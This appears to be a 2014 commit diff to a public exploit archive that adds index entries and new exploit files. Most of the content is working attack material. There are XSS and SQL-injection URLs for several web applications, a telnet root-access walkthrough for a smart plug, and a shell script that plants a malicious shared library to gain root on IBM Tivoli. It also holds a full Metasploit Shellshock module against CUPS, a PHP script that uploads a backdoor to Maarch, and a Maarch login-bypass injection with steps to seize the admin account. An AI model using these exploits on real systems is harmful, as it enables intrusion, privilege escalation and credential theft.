Updated 10_31_2014

2014-10-31 04:45:16 +00:00 · 2014-10-31 04:45:16 +00:00 · 63315eaa60
commit 63315eaa60
parent 61f891edbd
12 changed files with 595 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31620,3 +31620,14 @@ id,file,description,date,author,platform,type,port
 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
 35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
 35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass Vulnerability",2014-10-29,gamehacker,hardware,remote,0
 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross Site Scripting Vulnerability",2010-12-11,MustLive,php,webapps,0
 35107,platforms/cfm/webapps/35107.txt,"Mura CMS Multiple Cross Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0
 35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 'tags.php' Cross Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0
 35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 'rate.php' Cross Site Scripting and SQL Injection Vulnerabilities",2010-12-13,"c0de Hunters",php,webapps,0
 35110,platforms/php/webapps/35110.txt,"BlogCFC 5.9.6.001 Multiple Cross Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps,0
 35111,platforms/php/webapps/35111.txt,"slickMsg Cross Site Scripting and HTML Injection Vulnerabilities",2010-12-15,"Aliaksandr Hartsuyeu",php,webapps,0
 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
 35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80
 35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80
 35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,metasploit,linux,remote,631
--- a/platforms/cfm/webapps/35107.txt
+++ b/platforms/cfm/webapps/35107.txt
@ -0,0 +1,70 @@
 source: http://www.securityfocus.com/bid/45384/info
 Mura CMS is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials; other attacks are also possible.
 Mura CMS 5.2.2085 is vulnerable; other versions may also be affected. 
 1. Cross-site scripting:
 http://www.example.com/admin/index.cfm?email="><script>alert(1)</script>&fuseaction=cLogin.main&returnURL=1&status=sendlogin
 http://www.example.com/default/error/index.cfm?error.diagnostics="><script>alert(1)</script>
 http://www.example.com/admin/date_picker/dsp_dp_showmonth.cfm?+5=posn+1&dateLong="><script>alert(1)</script>
 http://www.example.com/admin/date_picker/index.cfm?field="><script>alert(1)</script>
 http://www.example.com/Admin/index.cfm?fuseaction=cLogin.main&returnURL=&status=sendlogin&email=<script>alert(1)</script>
 http://www.example.com/admin/view/layouts/compact.cfm?fusebox.ajax="><script>alert(1)</script>&
 http://www.example.com/admin/view/layouts/template.cfm?fusebox.ajax="><script>alert(1)</script>&myfusebox.originalcircuit=cLogin
 http://www.example.com/admin/view/layouts/template.cfm?moduleTitle=</title><body><script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_editCreative.cfm?attributes.siteid="><script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_editIPWhiteList.cfm?attributes.siteid="><script>alert(1)</script>&
 http://www.example.com/admin/view/vAdvertising/dsp_editPlacement.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_listAdZones.cfm?attributes.keywords="><script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_listAdvertisers.cfm?attributes.keywords="><script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_listCampaigns.cfm?attributes.keywords="><script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_listCreatives.cfm?attributes.keywords="><script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_viewReportByCampaign.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vAdvertising/dsp_viewReportByPlacement.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vArchitecture/form/dsp_tab_related_content.cfm?attributes.siteid="><script>alert(1)</script>&session.rb=default
 http://www.example.com/admin/view/vDashboard/dsp_sessionSearch.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vDashboard/dsp_topContent.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vDashboard/dsp_topRated.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
 http://www.example.com/admin/view/vDashboard/dsp_topReferers.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
 http://www.example.com/admin/view/vDashboard/dsp_topSearches.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
 http://www.example.com/admin/view/vEmail_Broadcaster/dsp_form.cfm?session.dateKey=<script>alert(1)
 </script>
 http://www.example.com/admin/view/vEmail_Broadcaster/dsp_list.cfm?session.dateKey=<script>alert(1)
 </script>
 http://www.example.com/admin/view/vExtend/dsp_attribute_form.cfm?attributes.formName=TextBox,TextArea,HTMLEditor,SelectBox,MultiSelectBox,RadioGroup,File,Hidden/"><script>alert(1)
 </script>&attributes.action=TextBox,TextArea,HTMLEditor,SelectBox,MultiSelectBox,RadioGroup,File,Hi
 dden
 http://www.example.com/admin/view/vExtend/dsp_editAttributes.cfm?attributes.extendSetID="><script>alert(1)</script>&attributes.subTypeID=extendSetssattributes.siteid=attributesArraya
 http://www.example.com/admin/view/vExtend/dsp_listSets.cfm?attributes.siteid="><script>alert(1)</script>&attributes.subTypeID=extendSetss
 http://www.example.com/admin/view/vExtend/dsp_listSubTypes.cfm?attributes.siteid="><script>alert(1)</script>
 http://www.example.com/admin/view/vFeed/ajax/dsp_loadSite_old.cfm?attributes.siteid="><script>alert(1)</script>
 http://www.example.com/admin/view/vFeed/dsp_list.cfm?attributes.siteid="><script>alert(1)</script>
 http://www.example.com/admin/view/vMailingList/dsp_form.cfm?attributes.mlid=1&attributes.siteid="><script>alert(1)</script>
 http://www.example.com/admin/view/vMailingList/dsp_list_members.cfm?attributes.siteid="><script>alert(1)
 </script>
 http://www.example.com/admin/view/vPrivateUsers/dsp_group.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vPrivateUsers/dsp_secondary_menu.cfm?attributes.siteid="><script>alert(1)</script>
 http://www.example.com/admin/view/vPrivateUsers/dsp_user.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vPrivateUsers/dsp_userprofile.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vPublicUsers/dsp_group.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vPublicUsers/dsp_user.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/admin/view/vSettings/dsp_plugin_form.cfm?session.dateKey=<script>alert(1)</script>
 http://www.example.com/default/includes/display_objects/calendar/dsp_dp_showmonth.cfm?dateLong="><script>alert(1)</script>
 http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/noxml/view/layout/lay_template.cfm?body="><script>alert(1)</script>
 http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/xml/view/display/dsp_hello.cfm?runTime="><script>alert(1)</script>
 http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/xml/view/layout/lay_template.cfm?body="><script>alert(1)</script>
 http://www.example.com/default/includes/email/inc_email.cfm?bodyHtml=<script>alert(1)</script>&forward=1&rsEmail.site=pcutest@procheckup.com&
 http://www.example.com/default/includes/email/inc_email.cfm?rsEmail.site=</title><body><script>alert(1)</script>
 http://www.example.com/default/includes/themes/merced/templates/inc/header.cfm?request.siteid="><script>alert(1)</script>
 http://www.example.com/default/includes/themes/merced/templates/inc/ie_conditional_includes.cfm?event.getSite.getAssetPath=1&themePath="><script>alert(1)</script>
 http://www.example.com/default/utilities/sendtofriend.cfm?request.siteID=Default&url.link="><script>alert(1)</script>http://www.procheckup.com
 http://www.example.com/requirements/mura/geoCoding/index.cfm?
 http://www.example.com/wysiwyg/editor/plugins/selectlink/fck_selectlink.cfm?fuseaction=cArch.search&keywords="><script>alert(1)</script>&session.siteid=default
 2) URI redirection:
 http://www.example.com/admin/index.cfm?fuseaction=cLogin.main&display=login&status=failed&rememberMe=1&contentid=&LinkServID=&returnURL=http://www.example.com
--- a/platforms/hardware/remote/35103.txt
+++ b/platforms/hardware/remote/35103.txt
@ -0,0 +1,26 @@
 -----------------------------------------------------------------------
          Konke Smart Plug Authentication Bypass Vulnerability
 -----------------------------------------------------------------------
 Author      : gamehacker&zixian
 Mail        : gh<gh@waloudong.org>&zixian<me@zixian.org>
 Date        : Oct, 17-2014
 Vendor      : http://www.kankunit.com/
 Link        : http://www.kankunit.com/
 Version     : K
 CVE         : CVE-2014-7279
 Exploit & p0c
 _____________
    “Konke” is a smart Home Furnishing products (http://www.kankunit.com/) in China, the product has a security vulnerability, an attacker could exploit the vulnerability to obtain equipment management authority.
    Konke Smart Plug open 23 port?we can telnet the 23 port?we can get root without password.
    1?Scan Konke. you can use nmap scan the 23 port.
    2?open cmd telnet Konke's 23 port.
    3?now you are the root. it is a openwrt,you can use busybox do everything! you can use "reboot" command to reboot Konke.and so on……
 _____________
--- a/platforms/linux/local/35112.sh
+++ b/platforms/linux/local/35112.sh
@ -0,0 +1,40 @@
 #!/bin/sh
 # Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit
 # CVE: CVE-2013-5467
 # Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni
 # Author: Robert Jaroszuk
 # Tested on: RedHat 5, Centos 5
 # Vulnerable version: IBM Tivoli Monitoring V6.2.2 (other versions not tested)
 #
 echo "[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk"
 echo "[+] Preparing the code..."
 cat > kbbacf1-pwn.c << DONE
 #define _GNU_SOURCE
 #include <unistd.h>
 #include <stdlib.h>
 #include <dlfcn.h>
 void __cxa_finalize (void *d) {
    return;
 }
 void __attribute__((constructor)) init() {
    setresuid(geteuid(), geteuid(), geteuid());
    execl("/bin/sh", (char *)NULL, (char *)NULL);
 }
 DONE
 cat > version << DONE
 GLIBC_2.2.5 { };
 GLIBC_2.3 { };
 GLIBC_2.3.2 { };
 GLIBC_PRIVATE { };
 DONE
 echo "[+] Preparing the code... part2"
 /usr/bin/gcc -Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.c
 echo "[+] Cleaning up..."
 /bin/rm -f kbbacf1-pwn.c version
 echo "[+] Exploiting."
 /opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1
--- a/platforms/linux/remote/35115.rb
+++ b/platforms/linux/remote/35115.rb
@ -0,0 +1,273 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'lcamtuf', # CVE-2014-6278
        'Brendan Coles <bcoles[at]gmail.com>' # msf
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['CVE', '2014-6278'],
        ['EDB', '34765'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Privileged' => false,
      'Arch' => ARCH_CMD,
      'Platform' => 'unix',
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x0A\x0D",
          'DisableNops' => true
        },
      'Compat' =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic bash awk ruby'
        },
      # Tested:
      # - CUPS version 1.4.3 on Ubuntu 10.04 (x86)
      # - CUPS version 1.5.3 on Debian 7 (x64)
      # - CUPS version 1.6.2 on Fedora 19 (x64)
      # - CUPS version 1.7.2 on Ubuntu 14.04 (x64)
      'Targets' =>  [[ 'Automatic Targeting', { 'auto' => true } ]],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))
    register_options([
      Opt::RPORT(631),
      OptBool.new('SSL', [ true, 'Use SSL', true ]),
      OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
      OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
      OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
      OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
    ], self.class)
  end
  #
  # CVE-2014-6271
  #
  def cve_2014_6271(cmd)
    %{() { :;}; $(#{cmd}) & }
  end
  #
  # CVE-2014-6278
  #
  def cve_2014_6278(cmd)
    %{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }}
  end
  #
  # Check credentials
  #
  def check
    @cookie = rand_text_alphanumeric(16)
    printer_name = rand_text_alphanumeric(10 + rand(5))
    res = add_printer(printer_name, '')
    if !res
      vprint_error("#{peer} - No response from host")
      return Exploit::CheckCode::Unknown
    elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/
      vprint_status("#{peer} - Found CUPS version #{$1}")
    else
      print_status("#{peer} - Target is not a CUPS web server")
      return Exploit::CheckCode::Safe
    end
    if res.body =~ /Set Default Options for #{printer_name}/
      vprint_good("#{peer} - Added printer successfully")
      delete_printer(printer_name)
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      vprint_error("#{peer} - Authentication failed")
    elsif res.code == 426
      vprint_error("#{peer} - SSL required - set SSL true")
    end
    Exploit::CheckCode::Detected
  end
  #
  # Exploit
  #
  def exploit
    @cookie = rand_text_alphanumeric(16)
    printer_name = rand_text_alphanumeric(10 + rand(5))
    # Select target CVE
    case datastore['CVE']
    when 'CVE-2014-6278'
      cmd = cve_2014_6278(payload.raw)
    else
      cmd = cve_2014_6271(payload.raw)
    end
    # Add a printer containing the payload
    # with a CUPS filter pointing to /bin/bash
    res = add_printer(printer_name, cmd)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
    elsif res.body =~ /Set Default Options for #{printer_name}/
      print_good("#{peer} - Added printer successfully")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
    elsif res.code == 426
      fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not add printer.")
    end
    # Add a test page to the print queue.
    # The print job triggers execution of the bash filter
    # which executes the payload in the environment variables.
    res = print_test_page(printer_name)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
    elsif res.body =~ /Test page sent; job ID is/
      vprint_good("#{peer} - Added test page to printer queue")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
    elsif res.code == 426
      fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.")
    end
    # Delete the printer
    res = delete_printer(printer_name)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
    elsif res.body =~ /has been deleted successfully/
      print_status("#{peer} - Deleted printer '#{printer_name}' successfully")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.")
    elsif res.code == 426
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.")
    else
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}'")
    end
  end
  #
  # Add a printer to CUPS
  #
  def add_printer(printer_name, cmd)
    vprint_status("#{peer} - Adding new printer '#{printer_name}'")
    ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd"
    ppd_file = <<-EOF
 *PPD-Adobe: "4.3"
 *%==== General Information Keywords ========================
 *FormatVersion: "4.3"
 *FileVersion: "1.00"
 *LanguageVersion: English
 *LanguageEncoding: ISOLatin1
 *PCFileName: "#{ppd_name}"
 *Manufacturer: "Brother"
 *Product: "(Brother MFC-3820CN)"
 *1284DeviceID: "MFG:Brother;MDL:MFC-3820CN"
 *cupsVersion: 1.1
 *cupsManualCopies: False
 *cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash"
 *cupsModelNumber: #{rand(10) + 1}
 *ModelName: "Brother MFC-3820CN"
 *ShortNickName: "Brother MFC-3820CN"
 *NickName: "Brother MFC-3820CN CUPS v1.1"
 *%
 *%==== Basic Device Capabilities =============
 *LanguageLevel: "3"
 *ColorDevice: True
 *DefaultColorSpace: RGB
 *FileSystem: False
 *Throughput: "12"
 *LandscapeOrientation: Plus90
 *VariablePaperSize: False
 *TTRasterizer: Type42
 *FreeVM: "1700000"
 *DefaultOutputOrder: Reverse
 *%==== Media Selection ======================
 *OpenUI *PageSize/Media Size: PickOne
 *OrderDependency: 18 AnySetup *PageSize
 *DefaultPageSize: BrLetter
 *PageSize BrA4/A4:        "<</PageSize[595 842]/ImagingBBox null>>setpagedevice"
 *PageSize BrLetter/Letter:      "<</PageSize[612 792]/ImagingBBox null>>setpagedevice"
 EOF
    pd = Rex::MIME::Message.new
    pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}"))
    pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid"))
    pd.add_part("add-printer", nil, nil, %(form-data; name="OP"))
    pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME"))
    pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable
    pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable
    pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI"))
    data = pd.to_s
    data.strip!
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'ctype' => "multipart/form-data; boundary=#{pd.bound}",
      'data' => data,
      'cookie' => "org.cups.sid=#{@cookie};",
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
    )
  end
  #
  # Queue a printer test page
  #
  def print_test_page(printer_name)
    vprint_status("#{peer} - Adding test page to printer queue")
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'printers', printer_name),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => "org.cups.sid=#{@cookie}",
      'vars_post' => {
        'org.cups.sid' => @cookie,
        'OP' => 'print-test-page'
      }
    )
  end
  #
  # Delete a printer
  #
  def delete_printer(printer_name)
    vprint_status("#{peer} - Deleting printer '#{printer_name}'")
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => "org.cups.sid=#{@cookie}",
      'vars_post' => {
        'org.cups.sid' => @cookie,
        'OP' => 'delete-printer',
        'printer_name' => printer_name,
        'confirm' => 'Delete Printer'
      }
    )
  end
 end
--- a/platforms/php/webapps/35106.txt
+++ b/platforms/php/webapps/35106.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/45374/info
 Cetera eCommerce is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Cetera eCommerce version 14.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/cms/templats/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
--- a/platforms/php/webapps/35108.txt
+++ b/platforms/php/webapps/35108.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/45388/info
 MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 MyBB 1.6 is vulnerable; other versions may be also be affected. 
 http://www.example.com/tags.php?tag="><script>alert(String.fromCharCode(88,83,83))</script> 
--- a/platforms/php/webapps/35109.txt
+++ b/platforms/php/webapps/35109.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/45389/info
 PHP TopSites is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
 Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 PHP TopSites 2.1 is vulnerable; other versions may also be affected. 
 The following example URIs are available:
 http://www.example.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x
 http://www.example.com/topsites/rate.php?site="'><script>alert('xss')</script> 
--- a/platforms/php/webapps/35110.txt
+++ b/platforms/php/webapps/35110.txt
@ -0,0 +1,28 @@
 source: http://www.securityfocus.com/bid/45395/info
 BlogCFC is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 BlogCFC 5.9.6.001 is vulnerable; other versions may also be affected. 
 http://www.example.com/tags/podlayout.cfm?ATTRIBUTES.TITLE=<script>alert(1)</script>&thistag.EXECUTIONMODE=start
 http://www.example.com/tags/textarea.cfm?attributes.class=">&lt;/textarea&gt;<script>alert(1)</script>&attributes.fieldname=Procheckup&attributes.style=1&attributes.value=1&
 http://www.example.com/includes/pods/subscribe.cfm?errorMessage="><script>alert(1)</script>
 http://www.example.com/index.cfm?errorMessage="><script>alert(1)</script>
 http://www.example.com/includes/pods/subscribe.cfm?"onmouseover="alert(1);
 http://www.example.com/index.cfm?"onmouseover="alert(1);
 http://www.example.com/search.cfm?"onmouseover="alert(1);
 http://www.example.com/stats.cfm?"onmouseover="alert(1);
 http://www.example.com/statsbyyear.cfm?"onmouseover="alert(1);
 http://www.example.com/tags/getpods.cfm?"onmouseover="alert(1);
--- a/platforms/php/webapps/35111.txt
+++ b/platforms/php/webapps/35111.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/45403/info
 slickMsg is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
 Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
 slickMsg 0.7-alpha is vulnerable; other versions may also be affected. 
 XSS example 1: [size=expression(alert(123))]size[/size]
 XSS example 2: [color=expression(alert(456))]blue[/color]
 http://www.example.com/vulns/161/exploit.html
--- a/platforms/php/webapps/35113.php
+++ b/platforms/php/webapps/35113.php
@ -0,0 +1,78 @@
 /******************************************************
 # Exploit Title: Maarch 1.4 Arbitrary file upload
 # Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
 # Date: 29/10/2014
 # Exploit Author: Adrien Thierry
 # Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
 # Vendor Homepage: http://maarch.org
 # Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip 
 # Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
 # Tested on: Linux / Windows 
 ******************************************************/
 The file "file_to_index.php" is accessible without any authentication to upload a file.
 This exploit code is a POC for Maarch Letterbox <= 2.4 and Maarch GEC/GED <= 1.4
 Exploit code :
 <?php
 /* EXPLOIT URL  */
 $target_url= "http://website.target/apps/maarch_enterprise/";
 /* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */
 $indexing_path = "indexing_searching/";
 /* TARGET UPLOAD FILE */
 $target_file = "file_to_index.php";
 /* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
 $file = "backdoor.php";
 /* NAME, EMPTY WITH LETTERBOX */
 $name = "shell";
 /* LAUNCHING EXPLOIT */
 do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);
 function do_post_request($url, $res, $file, $name)
 {
    $data = "";
    $boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
    $data .= "--$boundary\n";
    $fileContents = file_get_contents($file);
    $md5 = md5_file($file);
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
    $data .= "Content-Type: text/plain\n";
    $data .= "Content-Transfer-Encoding: binary\n\n";
    $data .= $fileContents."\n";
    $data .= "--$boundary--\n";
    $params = array('http' => array(
    'method' => 'POST',
    'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
    'content' => $data
    ));
 $ctx = stream_context_create($params);
    $fp = fopen($url, 'rb', false, $ctx);
    if (!$fp)
    {
       throw new Exception("Erreur !");
    }
    $response = @stream_get_contents($fp);
    if ($response === false)
    {
       throw new Exception("Erreur !");
    }
    else
    {
        echo "file should be here : ";
            /* LETTERBOX */
            if(count($response) > 1) echo $response;
            /* MAARCH ENTERPRISE | GEC */
            else echo "<a href='" . $res . "tmp/tmp_file_" . $name . "." . $ext . "'>BACKDOOR<a>";
    }
 }
 ?>
--- a/platforms/php/webapps/35114.txt
+++ b/platforms/php/webapps/35114.txt
@ -0,0 +1,27 @@
 /******************************************************
 # Exploit Title: Maarch 1.4 SQL Injection 
 # Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
 # Date: 29/10/2014
 # Exploit Author: Adrien Thierry
 # Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
 # Vendor Homepage: http://maarch.org
 # Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip 
 # Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
 # Tested on: Linux / Windows 
 ******************************************************/
 Maarch GEC <= 1.4 and Maarch Letterbox <= suffer from multiple sql injection vulnerabilities. The worst is at the login page, index.php :
 login : superadmin' OR user_id='easy
 pass : whatyouwant
 You see an sql error, but reload the web page, you are logged in.
 To change superadmin pass:
 Go to Menu -> Mon Profile
 Type your news password twice, an email etc, and click on save. New Sql error (history table, so we don't care), but password is changed.
 Clear your cookies, return to application url, enter your new fresh password, it's done.